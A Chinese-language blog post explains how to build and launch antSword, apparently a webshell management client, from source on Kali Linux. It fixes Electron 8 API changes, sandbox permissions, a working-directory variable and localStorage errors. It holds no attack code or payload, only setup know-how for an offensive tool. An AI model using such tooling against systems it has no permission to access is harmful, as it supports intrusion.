<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ ncu -u</span><br><span class="line">Upgrading &#x2F;home&#x2F;kali&#x2F;antSword&#x2F;package.json</span><br><span class="line">[&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;] 12&#x2F;12 100%</span><br><span class="line"></span><br><span class="line">All dependencies match the latest package versions :)</span><br></pre></td></tr></table></figure>

<p>执行<code>npm install</code>是会出现这样情况：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ npm install</span><br><span class="line">npm notice created a lockfile as package-lock.json. You should commit this file.</span><br><span class="line">npm WARN Invalid version: &quot;2.1.8.1&quot;</span><br><span class="line">npm WARN antSword No description</span><br><span class="line">npm WARN antSword No repository field.</span><br><span class="line">npm WARN antSword No README data</span><br><span class="line">npm WARN antSword No license field.</span><br><span class="line"></span><br><span class="line">up to date in 2.21s</span><br><span class="line">found 0 vulnerabilities</span><br></pre></td></tr></table></figure>

<p>版本号太长报警告，这时需要修改下<code>package.json</code>的版本号，将<code>2.1.8.1</code>修改为<code>2.1.8</code>，如果依赖包没安装成功的再执行一次<code>npm install</code>。</p>
<p>接着安装<code>Electron</code>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ npm install electron</span><br></pre></td></tr></table></figure>

<p>官方源速度可能会比较慢，可能会直接卡在<code>node install.js</code>很久，可以直接taobao源加速：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ELECTRON_CUSTOM_DIR&#x3D;8.0.0 npm install electron@8.0.0 --electron_mirror&#x3D;https:&#x2F;&#x2F;npm.taobao.org&#x2F;mirrors&#x2F;electron&#x2F;</span><br></pre></td></tr></table></figure>

<p>指定<code>ELECTRON_CUSTOM_DIR</code>是因为默认目录是<code>v8.0.0</code>，而taobao源是<code>8.0.0</code></p>
<h3 id="npm-start"><a href="#npm-start" class="headerlink" title="npm start"></a>npm start</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">$ npm start</span><br><span class="line"></span><br><span class="line">&gt; antsword@2.1.8 start &#x2F;home&#x2F;kali&#x2F;antSword</span><br><span class="line">&gt; AntSword app.js</span><br><span class="line"></span><br><span class="line">sh: 1: AntSword: not found</span><br><span class="line">npm ERR! code ELIFECYCLE</span><br><span class="line">npm ERR! syscall spawn</span><br><span class="line">npm ERR! file sh</span><br><span class="line">npm ERR! errno ENOENT</span><br><span class="line">npm ERR! antsword@2.1.8 start: &#96;AntSword app.js&#96;</span><br><span class="line">npm ERR! spawn ENOENT</span><br><span class="line">npm ERR! </span><br><span class="line">npm ERR! Failed at the antsword@2.1.8 start script.</span><br><span class="line">npm ERR! This is probably not a problem with npm. There is likely additional logging output above.</span><br></pre></td></tr></table></figure>

<p>因为启动配置是基于加载器，如果直接<code>npm start</code>是会报错的，这时找到<code>package.json</code>下面这里：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&quot;scripts&quot;: &#123;</span><br><span class="line">    &quot;start&quot;: &quot;AntSword app.js&quot;,</span><br><span class="line">    &quot;build&quot;: &quot;npm start&quot;</span><br><span class="line">  &#125;,</span><br></pre></td></tr></table></figure>

<p>修改为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&quot;scripts&quot;: &#123;</span><br><span class="line">    &quot;start&quot;: &quot;electron app.js&quot;,</span><br><span class="line">    &quot;build&quot;: &quot;npm start&quot;</span><br><span class="line">  &#125;,</span><br></pre></td></tr></table></figure>

<p>再次<code>npm start</code>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ npm start</span><br><span class="line"></span><br><span class="line">&gt; antsword@2.1.8 start &#x2F;home&#x2F;kali&#x2F;antSword</span><br><span class="line">&gt; electron app.js</span><br><span class="line"></span><br><span class="line">[13826:0218&#x2F;172302.279548:FATAL:setuid_sandbox_host.cc(157)] The SUID sandbox helper binary was found, but is not configured correctly. Rather than run without sandboxing I&#39;m aborting now. You need to make sure that &#x2F;home&#x2F;kali&#x2F;antSword&#x2F;node_modules&#x2F;electron&#x2F;dist&#x2F;chrome-sandbox is owned by root and has mode 4755.</span><br></pre></td></tr></table></figure>

<p>修改下权限：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo chown root:root .&#x2F;node_modules&#x2F;electron&#x2F;dist&#x2F;chrome-sandbox</span><br><span class="line"></span><br><span class="line">sudo sudo chmod 4755 .&#x2F;node_modules&#x2F;electron&#x2F;dist&#x2F;chrome-sandbox</span><br></pre></td></tr></table></figure>

<h3 id="registerStandardSchemes-amp-registerSchemesAsPrivileged"><a href="#registerStandardSchemes-amp-registerSchemesAsPrivileged" class="headerlink" title="registerStandardSchemes &amp; registerSchemesAsPrivileged"></a>registerStandardSchemes &amp; registerSchemesAsPrivileged</h3><p>再次执行<code>npm start</code>，这是可以看到GUI了，但弹了个错误窗口：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ npm start</span><br><span class="line"></span><br><span class="line">App threw an error during load</span><br><span class="line">TypeError: protocol.registerStandardSchemes is not a function</span><br><span class="line">    at Object.&lt;anonymous&gt; (&#x2F;home&#x2F;kali&#x2F;antSword&#x2F;app.js:19:10)</span><br><span class="line">    at Module._compile (internal&#x2F;modules&#x2F;cjs&#x2F;loader.js:968:30)</span><br><span class="line">    at Object.Module._extensions..js (internal&#x2F;modules&#x2F;cjs&#x2F;loader.js:986:10)</span><br><span class="line">    at Module.load (internal&#x2F;modules&#x2F;cjs&#x2F;loader.js:816:32)</span><br><span class="line">    at Module._load (internal&#x2F;modules&#x2F;cjs&#x2F;loader.js:728:14)</span><br><span class="line">    at Module._load (electron&#x2F;js2c&#x2F;asar.js:717:26)</span><br></pre></td></tr></table></figure>

<p>由于我安装的<code>E</code>是<code>v8.0.0</code>版本，新版本已经移除<code>registerStandardSchemes</code>，改为<code>registerSchemesAsPrivileged</code>，这时需要修改一下<code>app.js</code>里的相应代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">protocol.registerStandardSchemes([&#39;ant-views&#39;, &#39;ant-static&#39;, &#39;ant-src&#39;]);</span><br></pre></td></tr></table></figure>

<p>大概19行，修改为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">protocol.registerSchemesAsPrivileged([</span><br><span class="line">    &#123; scheme: &#39;ant-views&#39; &#125;, </span><br><span class="line">    &#123; scheme: &#39;ant-static&#39; &#125;, </span><br><span class="line">    &#123; scheme: &#39;ant-src&#39;&#125;</span><br><span class="line">]);</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/01/01.png" alt=""></p>
<h3 id="AS-WORKDIR"><a href="#AS-WORKDIR" class="headerlink" title="AS_WORKDIR"></a>AS_WORKDIR</h3><p>再次<code>npm start</code>，又弹出个错误框：</p>
<p><img src="/images/2020/03/01/02.png" alt=""></p>
<p>找到<code>modules/config.js</code>报错那行：</p>
<p><img src="/images/2020/03/01/03.png" alt=""></p>
<p>由于没有使用加载器，<code>AS_WORKDIR</code>默认是空的，所有报错了，整个目录搜索一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ grep --color -irn AS_WORKDIR</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/01/04.png" alt=""></p>
<p>挺多地方用到，为了偷懒，在<code>app.js</code> 入口这里直接指定当前目录：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">process.env.AS_WORKDIR &#x3D; process.env.PWD</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/01/05.png" alt=""></p>
<p>为了方便，在窗口初始化的时候打开控制台， 在<code>app.js</code>找到以下这行，去掉注释或直接另起一行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 打开调试控制台 mainWindow.webContents.openDevTools();</span><br></pre></td></tr></table></figure>


<h3 id="localStorage"><a href="#localStorage" class="headerlink" title="localStorage"></a>localStorage</h3><p>再次<code>npm start</code>，继续报错：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Uncaught DOMException: Failed to read the &#39;localStorage&#39; property from &#39;Window&#39;: Access is denied for this document.</span><br><span class="line"></span><br><span class="line">Uncaught (in promise) DOMException: Failed to read the &#39;localStorage&#39; property from &#39;Window&#39;: Access is denied for this document.</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/01/07.png" alt=""></p>
<p>数据被保护不给写，这时要回到<code>app.js</code>修改之前的<code>registerSchemesAsPrivileged</code>，添加参数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">privileges: &#123; standard: true &#125;</span><br></pre></td></tr></table></figure>

<p>修改后：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">protocol.registerSchemesAsPrivileged([</span><br><span class="line">    &#123; scheme: &#39;ant-views&#39;, privileges: &#123; standard: true &#125; &#125;, </span><br><span class="line">    &#123; scheme: &#39;ant-static&#39;, privileges: &#123; standard: true &#125; &#125;, </span><br><span class="line">    &#123; scheme: &#39;ant-src&#39;, privileges: &#123; standard: true &#125; &#125;</span><br><span class="line">]);</span><br></pre></td></tr></table></figure>

<p>再次<code>npm start</code>启动，看到熟悉的界面了：</p>
<p><img src="/images/2020/03/01/08.png" alt=""></p>
<h3 id="启动脚本"><a href="#启动脚本" class="headerlink" title="启动脚本"></a>启动脚本</h3><p>antSword.sh</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#! &#x2F;bin&#x2F;bash</span><br><span class="line"></span><br><span class="line">cd &#96;dirname $0&#96;</span><br><span class="line">npm start</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ chmod +x antSword.sh</span><br></pre></td></tr></table></figure>

<p>由于更新了依赖包版本，会有一些比如<code>setTemplateImage</code>、<code>ignoreHTTPS</code>之类的函数会提示废弃或不存在，发现自个改改就好了。</p>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/01/hello-world/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/03/01/hello-world/" itemprop="url">Hello World</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-01T01:01:01+08:00">
                2020-03-01
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <p>Welcome to <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/" target="_blank" rel="noopener">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html" target="_blank" rel="noopener">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues" target="_blank" rel="noopener">GitHub</a>.</p>
<h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></figure>

<p>More info: <a href="https://hexo.io/docs/writing.html" target="_blank" rel="noopener">Writing</a></p>
<h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure>

<p>More info: <a href="https://hexo.io/docs/server.html" target="_blank" rel="noopener">Server</a></p>
<h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure>

<p>More info: <a href="https://hexo.io/docs/generating.html" target="_blank" rel="noopener">Generating</a></p>
<h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure>

<p>More info: <a href="https://hexo.io/docs/one-command-deployment.html" target="_blank" rel="noopener">Deployment</a></p>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  </section>

  
          </div>
          

        </div>
        
          
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      
      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">zrools</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          
        </div>
      </section>

      
    </div>
  </aside>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zrools</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>


  <span class="post-meta-divider">|</span>


  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>


      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  
<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>


</body>
</html>